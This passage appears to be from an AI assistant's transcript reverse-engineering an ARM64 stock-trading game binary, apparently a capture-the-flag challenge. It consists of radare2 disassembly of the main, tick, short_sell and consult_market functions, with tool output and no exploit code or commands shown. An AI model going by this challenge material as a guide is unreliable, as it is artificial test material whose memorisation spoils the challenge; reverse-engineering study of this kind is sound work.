││││ 0x00001760 e01380b9 ldrsw x0, [var_10h] │ ││││ 0x00001764 00e47ad3 lsl x0, x0, 6 │ ││││ 0x00001768 4000008b add x0, x2, x0 ; 0x12818 │ ││││ ; obj.stocks │ ││││ 0x0000176c 013800b9 str w1, [x0, 0x38] │ ││││ 0x00001770 00008052 mov w0, 0 │ ││││ ; CODE XREFS from sym.short_sell @ 0x15e4(x), 0x1698(x), 0x16dc(x), 0x1734(x) │ └└└└─> 0x00001774 e103002a mov w1, w0 │ 0x00001778 800000b0 adrp x0, 0x12000 │ 0x0000177c 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001780 e30f40f9 ldr x3, [var_18h] │ 0x00001784 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001788 630002eb subs x3, x3, x2 │ 0x0000178c 020080d2 mov x2, 0 │ ┌─< 0x00001790 40000054 b.eq 0x1798 │ │ 0x00001794 9ffcff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.short_sell @ 0x1790(x) │ └─> 0x00001798 e003012a mov w0, w1 │ 0x0000179c fd7b42a9 ldp x29, x30, [var_20h] │ 0x000017a0 ffc30091 add sp, sp, 0x30 ; 0x178000 └ 0x000017a4 c0035fd6 ret ; DATA XREF from entry0 @ 0xae0(r) ; DATA XREF from entry.fini0 @ 0xb90(r) ┌ 988: int main (int64_t argc); │ `- args(sp[0x30..0x30]) vars(8:sp[0x8..0x2c]) │ 0x00001aa8 ffc300d1 sub sp, sp, 0x30 │ 0x00001aac fd7b02a9 stp x29, x30, [var_20h] │ 0x00001ab0 fd830091 add x29, sp, 0x20 │ 0x00001ab4 800000b0 adrp x0, 0x12000 │ 0x00001ab8 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001abc 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001ac0 e10f00f9 str x1, [var_18h] │ 0x00001ac4 010080d2 mov x1, 0 │ 0x00001ac8 ff0f00b9 str wzr, [var_ch] │ 0x00001acc ff0700b9 str wzr, [format] │ 0x00001ad0 ff1300b9 str wzr, [var_ch] │ 0x00001ad4 800000b0 adrp x0, 0x12000 │ 0x00001ad8 009443f9 ldr x0, [x0, 0x728] ; [0x15af0:8]=0 │ ; reloc.stdin │ 0x00001adc 000040f9 ldr x0, [x0] ; [0x15af0:8]=0 │ ; reloc.stdin ; FILE*stream │ 0x00001ae0 030080d2 mov x3, 0 ; size_t size │ 0x00001ae4 42008052 mov w2, 2 │ 0x00001ae8 010080d2 mov x1, 0 ; char *buf │ 
0x00001aec b9fbff97 bl sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size) │ 0x00001af0 800000b0 adrp x0, 0x12000 │ 0x00001af4 009043f9 ldr x0, [x0, 0x720] ; [0x15ae8:8]=0 │ ; reloc.stdout │ 0x00001af8 000040f9 ldr x0, [x0] ; [0x15ae8:8]=0 │ ; reloc.stdout ; FILE*stream │ 0x00001afc 030080d2 mov x3, 0 ; size_t size │ 0x00001b00 42008052 mov w2, 2 │ 0x00001b04 010080d2 mov x1, 0 ; char *buf │ 0x00001b08 b2fbff97 bl sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size) │ 0x00001b0c 01008052 mov w1, 0 │ 0x00001b10 000000b0 adrp x0, str.__Market__ ; 0x2000 │ 0x00001b14 00e00091 add x0, x0, 0x38 ; 0x2038 ; "/dev/urandom" ; const char *path │ 0x00001b18 b6fbff97 bl sym.imp.open ; int open(const char *path, int oflag) │ 0x00001b1c e01700b9 str w0, [var_14h] │ 0x00001b20 e01740b9 ldr w0, [var_14h] │ 0x00001b24 1f000071 cmp w0, 0 │ ┌─< 0x00001b28 ca000054 b.ge 0x1b40 │ │ 0x00001b2c 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b30 00200191 add x0, x0, 0x48 ; 0x2048 ; "open" ; const char *s │ │ 0x00001b34 9ffbff97 bl sym.imp.perror ; void perror(const char *s) │ │ 0x00001b38 00008012 mov w0, -1 │ ┌──< 0x00001b3c c5000014 b 0x1e50 │ ││ ; CODE XREF from main @ 0x1b28(x) │ │└─> 0x00001b40 e0130091 add x0, sp, 4 ; int fildes │ │ 0x00001b44 820080d2 mov x2, 4 ; size_t nbyte │ │ 0x00001b48 e10300aa mov x1, x0 ; void *buf │ │ 0x00001b4c e01740b9 ldr w0, [var_14h] │ │ 0x00001b50 ccfbff97 bl sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte) │ │ 0x00001b54 e00740b9 ldr w0, [format] │ │ 0x00001b58 cefbff97 bl sym.imp.srand ; void srand(int seed) │ │ 0x00001b5c e01740b9 ldr w0, [var_14h] │ │ 0x00001b60 b0fbff97 bl sym.imp.close ; int close(int fildes) │ │ 0x00001b64 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b68 00400191 add x0, x0, 0x50 ; 0x2050 ; "AAPL" ; int64_t arg1 │ │ 0x00001b6c b6fcff97 bl sym.add_stock │ │ 0x00001b70 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b74 00600191 add x0, x0, 0x58 ; 
0x2058 ; "GOOG" ; int64_t arg1 │ │ 0x00001b78 b3fcff97 bl sym.add_stock │ │ 0x00001b7c 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b80 00800191 add x0, x0, 0x60 ; 0x2060 ; "TSLA" ; int64_t arg1 │ │ 0x00001b84 b0fcff97 bl sym.add_stock │ │ 0x00001b88 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b8c 00a00191 add x0, x0, 0x68 ; 0x2068 ; "ARMH" ; int64_t arg1 │ │ 0x00001b90 adfcff97 bl sym.add_stock │ │ 0x00001b94 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001b98 00c00191 add x0, x0, 0x70 ; 0x2070 ; "NVDA" ; int64_t arg1 │ │ 0x00001b9c aafcff97 bl sym.add_stock │ │ 0x00001ba0 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001ba4 00e00191 add x0, x0, 0x78 ; 0x2078 ; "MSFT" ; int64_t arg1 │ │ 0x00001ba8 a7fcff97 bl sym.add_stock │ │ 0x00001bac 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001bb0 00000291 add x0, x0, 0x80 ; 0x2080 ; "ATVI" ; int64_t arg1 │ │ 0x00001bb4 a4fcff97 bl sym.add_stock │ │ 0x00001bb8 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001bbc 00200291 add x0, x0, 0x88 ; 0x2088 ; "CSCO" ; int64_t arg1 │ │ 0x00001bc0 a1fcff97 bl sym.add_stock │ │ 0x00001bc4 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001bc8 00400291 add x0, x0, 0x90 ; int64_t arg1 │ │ 0x00001bcc 9efcff97 bl sym.add_stock │ │ 0x00001bd0 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001bd4 00600291 add x0, x0, 0x98 ; 0x2098 ; "INTC" ; int64_t arg1 │ │ 0x00001bd8 9bfcff97 bl sym.add_stock │ │┌─< 0x00001bdc 91000014 b 0x1e20 │ ││ ; CODE XREF from main @ 0x1e30(x) │ ┌───> 0x00001be0 2cffff97 bl sym.tick │ ╎││ 0x00001be4 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001be8 00800291 add x0, x0, 0xa0 ; 0x20a0 ; "Current portfolio:" ; const char *s │ ╎││ 0x00001bec 99fbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001bf0 800000b0 adrp x0, 0x12000 │ ╎││ 0x00001bf4 00202091 add x0, x0, 0x808 ; 0x12808 │ ╎││ ; obj.money │ ╎││ 0x00001bf8 000040fd ldr d0, [x0] ; [0x12808:8]=0x40c3880000000000 ; obj.money │ ╎││ 0x00001bfc 000000b0 adrp x0, 
str.__Market__ ; 0x2000 │ ╎││ 0x00001c00 00e00291 add x0, x0, 0xb8 ; 0x20b8 ; "Money: $%.2f\n" ; const char *format │ ╎││ 0x00001c04 a7fbff97 bl sym.imp.printf ; int printf(const char *format) │ ╎││ 0x00001c08 ff0b00b9 str wzr, [format] │ ┌────< 0x00001c0c 1c000014 b 0x1c7c │ │╎││ ; CODE XREF from main @ 0x1c84(x) │ ┌─────> 0x00001c10 800000f0 adrp x0, 0x14000 │ ╎│╎││ 0x00001c14 01600491 add x1, x0, 0x118 ; 0x14118 │ ╎│╎││ ; obj.user_stocks │ ╎│╎││ 0x00001c18 e00b80b9 ldrsw x0, [format] │ ╎│╎││ 0x00001c1c 00e47ad3 lsl x0, x0, 6 │ ╎│╎││ 0x00001c20 2000008b add x0, x1, x0 ; 0x14118 │ ╎│╎││ ; obj.user_stocks │ ╎│╎││ 0x00001c24 003840b9 ldr w0, [x0, 0x38] │ ╎│╎││ 0x00001c28 1f000071 cmp w0, 0 │ ┌──────< 0x00001c2c 20020054 b.eq 0x1c70 │ │╎│╎││ 0x00001c30 e00b80b9 ldrsw x0, [format] │ │╎│╎││ 0x00001c34 01e47ad3 lsl x1, x0, 6 │ │╎│╎││ 0x00001c38 800000f0 adrp x0, 0x14000 │ │╎│╎││ 0x00001c3c 00600491 add x0, x0, 0x118 ; 0x14118 │ │╎│╎││ ; obj.user_stocks │ │╎│╎││ 0x00001c40 2300008b add x3, x1, x0 ; 0x14118 │ │╎│╎││ ; obj.user_stocks │ │╎│╎││ 0x00001c44 800000f0 adrp x0, 0x14000 │ │╎│╎││ 0x00001c48 01600491 add x1, x0, 0x118 ; 0x14118 │ │╎│╎││ ; obj.user_stocks │ │╎│╎││ 0x00001c4c e00b80b9 ldrsw x0, [format] │ │╎│╎││ 0x00001c50 00e47ad3 lsl x0, x0, 6 │ │╎│╎││ 0x00001c54 2000008b add x0, x1, x0 ; 0x14118 │ │╎│╎││ ; obj.user_stocks │ │╎│╎││ 0x00001c58 003840b9 ldr w0, [x0, 0x38] │ │╎│╎││ 0x00001c5c e203002a mov w2, w0 │ │╎│╎││ 0x00001c60 e10303aa mov x1, x3 │ │╎│╎││ 0x00001c64 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │╎│╎││ 0x00001c68 00200391 add x0, x0, 0xc8 ; 0x20c8 ; "%s: %d shares\n" ; const char *format │ │╎│╎││ 0x00001c6c 8dfbff97 bl sym.imp.printf ; int printf(const char *format) │ │╎│╎││ ; CODE XREF from main @ 0x1c2c(x) │ └──────> 0x00001c70 e00b40b9 ldr w0, [format] │ ╎│╎││ 0x00001c74 00040011 add w0, w0, 1 │ ╎│╎││ 0x00001c78 e00b00b9 str w0, [format] │ ╎│╎││ ; CODE XREF from main @ 0x1c0c(x) │ ╎└────> 0x00001c7c e00b40b9 ldr w0, [format] │ ╎ ╎││ 0x00001c80 
1f8c0171 cmp w0, 0x63 ; 'c' │ └─────< 0x00001c84 6dfcff54 b.le 0x1c10 │ ╎││ 0x00001c88 a0000090 adrp x0, 0x15000 │ ╎││ 0x00001c8c 00802891 add x0, x0, sym.imp.close ; 0xa20 │ ╎││ 0x00001c90 000040fd ldr d0, [x0] ; [0x15a20:8]=0 │ ╎││ ; obj.shorting_capacity │ ╎││ 0x00001c94 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001c98 00600391 add x0, x0, 0xd8 ; 0x20d8 ; "Shorting Capacity: $%.2f\n" ; const char *format │ ╎││ 0x00001c9c 81fbff97 bl sym.imp.printf ; int printf(const char *format) │ ╎││ 0x00001ca0 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001ca4 00e00391 add x0, x0, 0xf8 ; 0x20f8 ; "What would you like to do?" ; const char *s │ ╎││ 0x00001ca8 6afbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001cac 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001cb0 00600491 add x0, x0, 0x118 ; 0x2118 ; "1. Buy stock." ; const char *s │ ╎││ 0x00001cb4 67fbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001cb8 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001cbc 00a00491 add x0, x0, 0x128 ; 0x2128 ; "2. Sell stock." ; const char *s │ ╎││ 0x00001cc0 64fbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001cc4 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001cc8 00e00491 add x0, x0, 0x138 ; 0x2138 ; "3. Check stock price." ; const char *s │ ╎││ 0x00001ccc 61fbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001cd0 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001cd4 00400591 add x0, x0, 0x150 ; 0x2150 ; "4. Short sell stock." ; const char *s │ ╎││ 0x00001cd8 5efbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001cdc 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001ce0 00a00591 add x0, x0, 0x168 ; 0x2168 ; "5. Consult market." 
; const char *s │ ╎││ 0x00001ce4 5bfbff97 bl sym.imp.puts ; int puts(const char *s) │ ╎││ 0x00001ce8 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ╎││ 0x00001cec 00000691 add x0, x0, 0x180 ; 0x2180 ; "Enter your choice:" ; const char *format │ ╎││ 0x00001cf0 6cfbff97 bl sym.imp.printf ; int printf(const char *format) │ ╎││ 0x00001cf4 f6fbff97 bl sym.read_int │ ╎││ 0x00001cf8 e01300b9 str w0, [var_ch] │ ╎││ 0x00001cfc e01340b9 ldr w0, [var_ch] │ ╎││ 0x00001d00 1f140071 cmp w0, 5 │ ┌────< 0x00001d04 40070054 b.eq 0x1dec │ │╎││ 0x00001d08 e01340b9 ldr w0, [var_ch] │ │╎││ 0x00001d0c 1f140071 cmp w0, 5 │ ┌─────< 0x00001d10 2c070054 b.gt 0x1df4 │ ││╎││ 0x00001d14 e01340b9 ldr w0, [var_ch] │ ││╎││ 0x00001d18 1f100071 cmp w0, 4 │ ┌──────< 0x00001d1c 20050054 b.eq 0x1dc0 │ │││╎││ 0x00001d20 e01340b9 ldr w0, [var_ch] │ │││╎││ 0x00001d24 1f100071 cmp w0, 4 │ ┌───────< 0x00001d28 6c060054 b.gt 0x1df4 │ ││││╎││ 0x00001d2c e01340b9 ldr w0, [var_ch] │ ││││╎││ 0x00001d30 1f0c0071 cmp w0, 3 │ ────────< 0x00001d34 20040054 b.eq 0x1db8 │ ││││╎││ 0x00001d38 e01340b9 ldr w0, [var_ch] │ ││││╎││ 0x00001d3c 1f0c0071 cmp w0, 3 │ ────────< 0x00001d40 ac050054 b.gt 0x1df4 │ ││││╎││ 0x00001d44 e01340b9 ldr w0, [var_ch] │ ││││╎││ 0x00001d48 1f040071 cmp w0, 1 │ ────────< 0x00001d4c a0000054 b.eq 0x1d60 │ ││││╎││ 0x00001d50 e01340b9 ldr w0, [var_ch] │ ││││╎││ 0x00001d54 1f080071 cmp w0, 2 │ ────────< 0x00001d58 a0010054 b.eq 0x1d8c │ ────────< 0x00001d5c 26000014 b 0x1df4 │ ││││╎││ ; CODE XREF from main @ 0x1d4c(x) │ ────────> 0x00001d60 0efdff97 bl sym.buy_stock │ ││││╎││ 0x00001d64 1f000071 cmp w0, 0 │ ────────< 0x00001d68 a1000054 b.ne 0x1d7c │ ││││╎││ 0x00001d6c 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ││││╎││ 0x00001d70 00600691 add x0, x0, 0x198 ; 0x2198 ; "Transaction successful."
; const char *s │ ││││╎││ 0x00001d74 37fbff97 bl sym.imp.puts ; int puts(const char *s) │ ────────< 0x00001d78 23000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d68(x) │ ────────> 0x00001d7c 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ││││╎││ 0x00001d80 00c00691 add x0, x0, 0x1b0 ; 0x21b0 ; "Transaction failed." ; const char *s │ ││││╎││ 0x00001d84 33fbff97 bl sym.imp.puts ; int puts(const char *s) │ ────────< 0x00001d88 1f000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d58(x) │ ────────> 0x00001d8c 88fdff97 bl sym.sell_stock │ ││││╎││ 0x00001d90 1f000071 cmp w0, 0 │ ────────< 0x00001d94 a1000054 b.ne 0x1da8 │ ││││╎││ 0x00001d98 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ││││╎││ 0x00001d9c 00600691 add x0, x0, 0x198 ; 0x2198 ; "Transaction successful." ; const char *s │ ││││╎││ 0x00001da0 2cfbff97 bl sym.imp.puts ; int puts(const char *s) │ ────────< 0x00001da4 18000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d94(x) │ ────────> 0x00001da8 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ││││╎││ 0x00001dac 00c00691 add x0, x0, 0x1b0 ; 0x21b0 ; "Transaction failed." ; const char *s │ ││││╎││ 0x00001db0 28fbff97 bl sym.imp.puts ; int puts(const char *s) │ ────────< 0x00001db4 14000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d34(x) │ ────────> 0x00001db8 7cfeff97 bl sym.check_stock_price │ ────────< 0x00001dbc 12000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d1c(x) │ │└──────> 0x00001dc0 f3fdff97 bl sym.short_sell │ │ ││╎││ 0x00001dc4 1f000071 cmp w0, 0 │ │┌──────< 0x00001dc8 a1000054 b.ne 0x1ddc │ ││││╎││ 0x00001dcc 000000b0 adrp x0, str.__Market__ ; 0x2000 │ ││││╎││ 0x00001dd0 00600691 add x0, x0, 0x198 ; 0x2198 ; "Transaction successful." 
; const char *s │ ││││╎││ 0x00001dd4 1ffbff97 bl sym.imp.puts ; int puts(const char *s) │ ────────< 0x00001dd8 0b000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1dc8(x) │ │└──────> 0x00001ddc 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ ││╎││ 0x00001de0 00c00691 add x0, x0, 0x1b0 ; 0x21b0 ; "Transaction failed." ; const char *s │ │ ││╎││ 0x00001de4 1bfbff97 bl sym.imp.puts ; int puts(const char *s) │ │┌──────< 0x00001de8 07000014 b 0x1e04 │ ││││╎││ ; CODE XREF from main @ 0x1d04(x) │ │││└────> 0x00001dec f0feff97 bl sym.consult_market │ │││┌────< 0x00001df0 05000014 b 0x1e04 │ ││││╎││ ; CODE XREFS from main @ 0x1d10(x), 0x1d28(x), 0x1d40(x), 0x1d5c(x) │ └─└─────> 0x00001df4 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ │╎││ 0x00001df8 00200791 add x0, x0, 0x1c8 ; 0x21c8 ; "Invalid choice." ; const char *s │ │ │╎││ 0x00001dfc 15fbff97 bl sym.imp.puts ; int puts(const char *s) │ │ │╎││ 0x00001e00 1f2003d5 nop │ │ │╎││ ; XREFS: CODE 0x00001d78 CODE 0x00001d88 CODE 0x00001da4 │ │ │╎││ ; XREFS: CODE 0x00001db4 CODE 0x00001dbc CODE 0x00001dd8 │ │ │╎││ ; XREFS: CODE 0x00001de8 CODE 0x00001df0 │ ─└─└────> 0x00001e04 a0000090 adrp x0, 0x15000 │ ╎││ 0x00001e08 00a02891 add x0, x0, 0xa28 ; 0x15a28 │ ╎││ ; obj.trades │ ╎││ 0x00001e0c 000040b9 ldr w0, [x0] ; [0x15a28:8]=0 │ ╎││ ; obj.trades │ ╎││ 0x00001e10 01040011 add w1, w0, 1 │ ╎││ 0x00001e14 a0000090 adrp x0, 0x15000 │ ╎││ 0x00001e18 00a02891 add x0, x0, 0xa28 ; 0x15a28 │ ╎││ ; obj.trades │ ╎││ 0x00001e1c 010000b9 str w1, [x0] ; 0x15a28 │ ╎││ ; obj.trades │ ╎││ ; CODE XREF from main @ 0x1bdc(x) │ ╎│└─> 0x00001e20 a0000090 adrp x0, 0x15000 │ ╎│ 0x00001e24 00a02891 add x0, x0, 0xa28 ; 0x15a28 │ ╎│ ; obj.trades │ ╎│ 0x00001e28 000040b9 ldr w0, [x0] ; [0x15a28:8]=0 │ ╎│ ; obj.trades │ ╎│ 0x00001e2c 1f8c0171 cmp w0, 0x63 ; 'c' │ └───< 0x00001e30 89edff54 b.ls 0x1be0 │ │ 0x00001e34 800000b0 adrp x0, 0x12000 │ │ 0x00001e38 00202091 add x0, x0, 0x808 ; 0x12808 │ │ ; obj.money │ │ 0x00001e3c 000040fd ldr d0, [x0] ; 
[0x12808:8]=0x40c3880000000000 ; obj.money │ │ 0x00001e40 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │ 0x00001e44 00600791 add x0, x0, 0x1d8 ; 0x21d8 ; "Final amount of money: %.2f\n" ; const char *format │ │ 0x00001e48 16fbff97 bl sym.imp.printf ; int printf(const char *format) │ │ 0x00001e4c 00008052 mov w0, 0 │ │ ; CODE XREF from main @ 0x1b3c(x) │ └──> 0x00001e50 e103002a mov w1, w0 │ 0x00001e54 800000b0 adrp x0, 0x12000 │ 0x00001e58 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001e5c e30f40f9 ldr x3, [var_18h] │ 0x00001e60 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001e64 630002eb subs x3, x3, x2 │ 0x00001e68 020080d2 mov x2, 0 │ ┌─< 0x00001e6c 40000054 b.eq 0x1e74 │ │ 0x00001e70 e8faff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from main @ 0x1e6c(x) │ └─> 0x00001e74 e003012a mov w0, w1 │ 0x00001e78 fd7b42a9 ldp x29, x30, [var_20h] │ 0x00001e7c ffc30091 add sp, sp, 0x30 ; 0x178000 └ 0x00001e80 c0035fd6 ret - **Assistant:** INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. 
Use -B 0x800000 or aav0 ; CALL XREF from main @ 0x1be0(x) ┌ 284: sym.tick (int64_t arg_30h); │ `- args() vars(5:sp[0x8..0x24]) │ 0x00001890 ffc300d1 sub sp, sp, 0x30 │ 0x00001894 fd7b02a9 stp x29, x30, [var_20h] │ 0x00001898 fd830091 add x29, sp, 0x20 │ 0x0000189c 800000b0 adrp x0, 0x12000 │ 0x000018a0 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000018a4 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000018a8 e10f00f9 str x1, [var_18h] │ 0x000018ac 010080d2 mov x1, 0 │ 0x000018b0 800000b0 adrp x0, 0x12000 │ 0x000018b4 00202091 add x0, x0, 0x808 ; 0x12808 │ ; obj.money │ 0x000018b8 000040fd ldr d0, [x0] ; [0x12808:8]=0x40c3880000000000 ; obj.money │ 0x000018bc 0000c8d2 mov x0, 0x400000000000 │ 0x000018c0 e011e8f2 movk x0, 0x408f, lsl 48 │ 0x000018c4 0100679e fmov d1, x0 │ 0x000018c8 0018611e fdiv d0, d0, d1 │ 0x000018cc a0000090 adrp x0, 0x15000 │ 0x000018d0 00802891 add x0, x0, sym.imp.close ; 0xa20 │ 0x000018d4 000000fd str d0, [x0] ; 0x15a20 │ ; obj.shorting_capacity │ 0x000018d8 ff0f00b9 str wzr, [var_ch] │ ┌─< 0x000018dc 22000014 b 0x1964 │ │ ; CODE XREF from sym.tick @ 0x1978(x) │ ┌──> 0x000018e0 ff0b00f9 str xzr, [var_10h] │ ╎│ 0x000018e4 47fcff97 bl sym.imp.rand ; int rand(void) │ ╎│ 0x000018e8 00000012 and w0, w0, 1 │ ╎│ 0x000018ec 1f000071 cmp w0, 0 │ ┌───< 0x000018f0 e0000054 b.eq 0x190c │ │╎│ 0x000018f4 200fe8d2 mov x0, 0x4079000000000000 ; int64_t arg_30h │ │╎│ 0x000018f8 0100679e fmov d1, x0 │ │╎│ 0x000018fc 0090741e fmov d0, -10 │ │╎│ 0x00001900 30fdff97 bl sym.drand │ │╎│ 0x00001904 e00b00fd str d0, [var_10h] │ ┌────< 0x00001908 06000014 b 0x1920 │ ││╎│ ; CODE XREF from sym.tick @ 0x18f0(x) │ │└───> 0x0000190c 0190641e fmov d1, 10 │ │ ╎│ 0x00001910 200bf8d2 mov x0, -0x3fa7000000000000 ; int64_t arg_30h │ │ ╎│ 0x00001914 0000679e fmov d0, x0 │ │ ╎│ 0x00001918 2afdff97 bl sym.drand │ │ ╎│ 0x0000191c e00b00fd str d0, [var_10h] │ │ ╎│ ; CODE XREF from sym.tick @ 0x1908(x) │ └────> 0x00001920 
800000b0 adrp x0, 0x12000 │ ╎│ 0x00001924 01602091 add x1, x0, 0x818 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x00001928 e00f80b9 ldrsw x0, [var_ch] │ ╎│ 0x0000192c 00e47ad3 lsl x0, x0, 6 │ ╎│ 0x00001930 2000008b add x0, x1, x0 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x00001934 011840fd ldr d1, [x0, 0x30] │ ╎│ 0x00001938 e00b40fd ldr d0, [var_10h] │ ╎│ 0x0000193c 2028601e fadd d0, d1, d0 │ ╎│ 0x00001940 800000b0 adrp x0, 0x12000 │ ╎│ 0x00001944 01602091 add x1, x0, 0x818 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x00001948 e00f80b9 ldrsw x0, [var_ch] │ ╎│ 0x0000194c 00e47ad3 lsl x0, x0, 6 │ ╎│ 0x00001950 2000008b add x0, x1, x0 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x00001954 001800fd str d0, [x0, 0x30] │ ╎│ 0x00001958 e00f40b9 ldr w0, [var_ch] │ ╎│ 0x0000195c 00040011 add w0, w0, 1 │ ╎│ 0x00001960 e00f00b9 str w0, [var_ch] │ ╎│ ; CODE XREF from sym.tick @ 0x18dc(x) │ ╎└─> 0x00001964 e10f40b9 ldr w1, [var_ch] │ ╎ 0x00001968 a0000090 adrp x0, 0x15000 │ ╎ 0x0000196c 00602891 add x0, x0, 0xa18 ; 0x15a18 │ ╎ ; obj.num_stocks │ ╎ 0x00001970 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ ╎ ; obj.num_stocks │ ╎ 0x00001974 3f00006b cmp w1, w0 │ └──< 0x00001978 43fbff54 b.lo 0x18e0 │ 0x0000197c 1f2003d5 nop │ 0x00001980 800000b0 adrp x0, 0x12000 │ 0x00001984 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001988 e20f40f9 ldr x2, [var_18h] │ 0x0000198c 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001990 420001eb subs x2, x2, x1 │ 0x00001994 010080d2 mov x1, 0 │ ┌─< 0x00001998 40000054 b.eq 0x19a0 │ │ 0x0000199c 1dfcff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.tick @ 0x1998(x) │ └─> 0x000019a0 fd7b42a9 ldp x29, x30, [var_20h] │ 0x000019a4 ffc30091 add sp, sp, 0x30 ; 0x178000 └ 0x000019a8 c0035fd6 ret - **Assistant:** INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav 
because base address is zero. Use -B 0x800000 or aav0 INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 ; CALL XREF from main @ 0x1dec(x) ┌ 252: sym.consult_market (int64_t arg_20h); │ `- args() vars(4:sp[0x8..0x1c]) │ 0x000019ac ff8300d1 sub sp, sp, 0x20 │ 0x000019b0 fd7b01a9 stp x29, x30, [var_10h] │ 0x000019b4 fd430091 add x29, sp, 0x10 │ 0x000019b8 800000b0 adrp x0, 0x12000 │ 0x000019bc 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000019c0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000019c4 e10700f9 str x1, [var_8h] │ 0x000019c8 010080d2 mov x1, 0 │ 0x000019cc 000000b0 adrp x0, str.__Market__ ; 0x2000 │ 0x000019d0 00000091 add x0, x0, 0 ; 0x2000 ; "- Market -" ; const char *s │ 0x000019d4 1ffcff97 bl sym.imp.puts ; int puts(const char *s) │ 0x000019d8 ff0700b9 str wzr, [format] │ ┌─< 0x000019dc 21000014 b 0x1a60 │ │ ; CODE XREF from sym.consult_market @ 0x1a68(x) │ ┌──> 0x000019e0 800000b0 adrp x0, 0x12000 │ ╎│ 0x000019e4 01602091 add x1, x0, 0x818 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x000019e8 e00780b9 ldrsw x0, [format] │ ╎│ 0x000019ec 00e47ad3 lsl x0, x0, 6 │ ╎│ 0x000019f0 2000008b add x0, x1, x0 ; 0x12818 │ ╎│ ; obj.stocks │ ╎│ 0x000019f4 003840b9 ldr w0, [x0, 0x38] │ 